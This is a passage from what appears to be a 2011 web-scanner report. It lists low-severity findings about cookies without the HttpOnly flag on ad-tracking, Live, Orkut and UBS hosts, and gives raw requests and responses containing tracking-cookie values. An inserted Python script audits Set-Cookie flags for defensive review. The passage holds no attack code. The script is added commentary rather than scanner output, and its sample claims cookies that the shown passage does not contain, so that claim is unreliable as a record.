biYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ib.adnxs.com/seg?member=514&add_code=
Content-Length: 0
Date: Wed, 06 Jul 2011 14:01:07 GMT


10.54. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/203785884.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/203785884.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252F%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="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"; 
rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
Set-Cookie: rtc_vsLf=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; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:08 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

10.55. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K08784/b3/0/3/1008211/223509117.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K08784/b3/0/3/1008211/223509117.js?D=DM_LOC%3Dhttp%253A%252F%252Ftechflash.com%252Fabout.html%253Fpid%253DACBJ%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Ftechflash.com%252F%26DM_EOM%3D1&C=K08784 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="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"; rsi_us_1000000="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"; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; rsi_segs_1000000=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; rtc_SA26=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; 
udm_0=MLv3NzMJZjpn3hepL5u85DdJSwnsJulKw7GjhUc66G1t5sARqqsaA7LZsKuuAdTsr767GbQcHDkWCrTmeWLtWp6yJz762TB1UwcjeHZXUyd9djFNJcLio30yxF0HHJw8BhRaZV09XADuFryc7t6F+RKBP1VaY7UwWUB6Hqw/8hvNvCj0P2aI5BUiVaG+ymma61YZrZ6cNi/7+BUP0nU3S/7aDey8pNKbTFe5PtnGelVZx+7RzWne/EK0Hqzvg/cAt24xuyuQiRcU+otjq8L91/vhBet19A0gHxTyU8bHnQxFZQGXBELihm7JUcNFWfDqL5oCOH9CkkBF/VWGyJdwtLmAAMBzOVpAH5rEQxhhn0ldtQhNKu95VbXaqi9Hy7HcpaYFFAG0gZBby/Ino2ND/TX6tyQ5BZVEmjC+vrBUCdi5gDjg8vCrIq6mOhXIxsr1rgP8VqKRS2482lJZLRiYVHVavyAnmm0xR9AiAdeo7Ulq59C1wDZnxwfvLEeBAQQvJD4UAZPMnAWC71qNBnXlSwn6B+iu+W0enrMzUh+pt/42W3ZyHY6wPL0wN55ZpdBoj2pz9x8DZxFJC8/0xAJN9asAv63LYh4pP2tKYCBkV7sKBfAVfyGLdNX/pP4+LEd7PMBqXJitqkzbF9+MLaphweZ3TkcNlE7FaGnjxQPdRypua7cLagU/pdcDVheJzU1Qpv5fnqo9hEcP5pXLebWRI35fOi6VMBuXnQHASM+ZvmIW7roY6dkcDDEPcSnE/eVzUk1c/p+XX0Gk0keWgb40WTFsa/iaQB6LydhfqaYhZGfvb7xoznGXYdL5IifgNcFokjWzep4hkl8kRRTKjBctzuSV0dfTjVJqWlkVn7ojPnTBtr7nvJyfyXssvc/oZPEKn6xtEkyP+huheQDpHwPE81CoOtg/xxDXS0cNluwSTrrZ/tcX/xM4VOQR6XJV7wiNgHj3COP52BgkFWuYCBWpp1Ij5FPQMSbt7pTH2c7UBstZHYsg3GEOgYj0QEAQUa+Gg3z/6YHY+hyOzKt+cCLpId3IuTquVU751kovG4jfZSDMngJEtub6vIo6aw9Ns/MIKRJThup9RJD3VB7EqUTygRfVC30WTM3yC/zCJcQvarkTIoqam+R1D4GnO60sxQIS+e/mX1w/KtPS81kyXN6TiaVQ7uglYyqBXtk/zz0qF6qzFm//Nv417kCWRG0/vOhqEU/d8q3yrAyqHEYTSMmgweeGAIN90FXwo5jDGblHJSyXqxHWV9tUDHtz1PxpJxB1N8GXbFB5TYAQUhQ7vJg7adz9jm8rfw8Y7beMhj+wZIuYSnRxUzpmUnS6ofeg1QUuC+Z3qf9S7L5SQNszvtcoLBc9Ah719T7f1ysEtywa9Vsd4Wwjl8zKCUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmxDEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_v0Na=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SA26=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vpu9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iydh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
Set-Cookie: rtc_N0S3=...[SNIP]...; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:44 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 173
Date: Wed, 06 Jul 2011 14:01:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['K08784_10001'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['K08784_10001'],'k08784');}

10.56. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
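
The review the scanner asks for can be scripted. The block below is an added example, not part of the scanner report or its tooling: it parses the Set-Cookie headers of a raw HTTP response, reports which of HttpOnly and Secure are missing, records the Domain scope, and flags values that look like opaque tokens (long and high-entropy) so a human checks whether they carry session state. The sample response is constructed from Set-Cookie lines that appear elsewhere in this report; the entropy threshold and the "token-like" heuristic are assumptions, not anything the scanner itself does.

```python
"""Audit Set-Cookie headers for missing HttpOnly/Secure flags.

Added example, not part of the scanner report. SAMPLE_RESPONSE is
constructed from Set-Cookie lines shown in this report; the token
heuristic (length + Shannon entropy thresholds) is an assumption.
"""
import math
from collections import Counter

# Constructed sample: four cookies with different attribute sets.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com\r\n"
    "Set-Cookie: Navajo=Oomvgp9vP3Ft8Qme0xj/ea+sM9tLIa0aq2VJZr9IfFggC27Pyuw23/id1aMLQ/bugMyFA28yaAE-; Path=/; Secure; Version=1\r\n"
    "Set-Cookie: ubslang=en-US; Domain=.ubs.com; Path=/; Secure; Version=1\r\n"
    "Set-Cookie: xidseq=2; domain=.live.com; path=/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attr_lower: val}).

    Only the first '=' separates name from value, so values that
    themselves contain '=' (base64 padding, nested key=value) survive.
    Flag attributes such as Secure/HttpOnly map to an empty string.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def shannon_entropy(s):
    """Bits per character; 0.0 for empty or single-symbol strings."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def looks_like_token(value, min_len=16, min_entropy=3.5):
    """Assumed heuristic: long, high-entropy values deserve a manual look."""
    return len(value) >= min_len and shannon_entropy(value) >= min_entropy


def audit_response(raw):
    """Return one finding dict per Set-Cookie header in the response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    findings = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        key, sep, val = line.partition(":")
        if not sep or key.strip().lower() != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(val.strip())
        missing = [flag for flag in ("httponly", "secure") if flag not in attrs]
        findings.append({
            "name": name,
            "missing": missing,
            "domain": attrs.get("domain", "(host-only)"),
            "token_like": looks_like_token(value),
        })
    return findings


if __name__ == "__main__":
    for f in audit_response(SAMPLE_RESPONSE):
        print(f"{f['name']:10s} missing={f['missing']} domain={f['domain']} "
              f"review={'yes' if f['token_like'] else 'no'}")
```

Read the output with the scanner's own caveat in mind: a missing HttpOnly flag matters in proportion to what the cookie holds, so the `token_like` column is a prompt to inspect the value, not a verdict. A missing Secure flag is only meaningful for cookies set over HTTPS; for the plain-http hosts in this report it is expected, and a parent-domain scope such as `.ubs.com` or `.live.com` is worth noting because every subdomain can then read and overwrite the cookie.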

Request

GET /pixel;r=1794506331;fpan=0;fpa=P0-399196261-1309960828609;ns=0;url=http%3A%2F%2Ftechflash.com%2Fabout.html;ref=http%3A%2F%2Ftechflash.com%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1309960851219;tzo=300;a=p-b1m9DYkJHhIgg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EE0ACvaeApllAacBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0dpKRrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q

Response

HTTP/1.1 302 Found
Connection: close
Location: http://www.burstnet.com/enlightn/7111//82F1/
Set-Cookie: d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU; expires=Tue, 04-Oct-2011 14:00:51 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Wed, 06 Jul 2011 14:00:51 GMT
Server: QS


10.57. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-5eu58oSpL1cEs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-5eu58oSpL1cEs.gif?labels=_fp.channel.Beauty+of+the+Web,_fp.event.All+Content HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EFkACvaeApllAawBAZQHgdUOHqk9Hk4aHCkZKMSWr4EAiBAAlgpgDm8r4gzhXR4Q0Q4Q0ZkuW5Kxa4EogQ9w4RCR0Q5U8w0bswpeFAMFAOY9JfM9FOEA_TDp8qYQ2k99xeU

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EO8AFPaeApll_6ixz4EBrAEBlAeB1Q4eqT0eThocKRkoxJavgQCIEACWCmAObyviDOFdHhDRDhDRmS5bkrFrgSiBD3DhEJHRDlTzDRuzCl4UAwUA5j0l8z0U4QD9MOnyphDaT33F5Q; expires=Tue, 04-Oct-2011 15:39:02 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 06 Jul 2011 15:39:02 GMT
Server: QS

GIF89a.......,.................D..;

10.58. http://profile.live.com/badge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /badge/?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft+News+Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png HTTP/1.1
Host: profile.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; sc_clustbl_142=6725091ecd4325b02:nK2egy9F4YAy3X0iJIsk4gWz/TnLERdzTYsLBI8gS4dY1I1zZH7VdzxoWPietMFwJ+QtJqQopIgEEkfF8AtEkdCRD5CVTskP/DRQUugWImwwVCCEmH0dJyGBA/G61wU3f520yqTm46/CX4/Eyo6aSA==; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950981&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1
Server: Microsoft-IIS/7.5
X-Imf: 8b22b2cd-4263-44ba-aaeb-e42b091bf16a
Set-Cookie: E=P:bOIwReUJzog=:+1yDfpFa5Q6cY2Ra7+2GtI6CZeM5y7anIF6uyN3OFUc=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: SABadge=msg=&url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx&title=Microsoft%20News%20Center&description=&screenshot=https%3a%2f%2fwww.microsoft.com%2fpresspass%2f_resources%2fimages%2fimg_simpleShareThumb_blue134.png&ctype=link&swfurl=&height=&width=&emv=; expires=Thu, 07-Jul-2011 11:16:21 GMT; path=/Badge/
Set-Cookie: sc_clustbl_142=d751af858b13d51f; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC667 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Content-Length: 314

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1309950981&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

10.59. http://promote.orkut.com/preview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://promote.orkut.com
Path:   /preview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preview HTTP/1.1
Host: promote.orkut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5d2db29b869c8b64:TM=1309951271:LM=1309951271:S=xyDavJj_t78LgYQs; expires=Fri, 05-Jul-2013 11:21:11 GMT; path=/; domain=promote.orkut.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:11 GMT
Server: orkut_broadcast
Content-Length: 11782
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 400 (Bad Request)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;colo
...[SNIP]...

10.60. https://quotes-public.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
